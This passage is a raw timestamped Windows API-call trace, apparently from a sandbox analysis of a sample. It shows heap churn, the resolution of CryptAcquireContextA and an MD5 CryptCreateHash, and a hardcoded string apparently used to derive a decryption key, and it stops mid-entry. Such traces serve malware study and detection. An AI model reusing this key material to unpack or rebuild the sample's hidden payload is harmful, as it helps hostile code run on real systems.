[0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.373] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0080.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb108 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0080.373] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.373] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0080.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0080.374] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.374] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0080.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb240 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0080.375] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.377] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0080.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.378] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.378] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4d00) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.380] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0080.380] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb420, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0080.381] CryptCreateHash (in: hProv=0x41a4d00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.381] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", 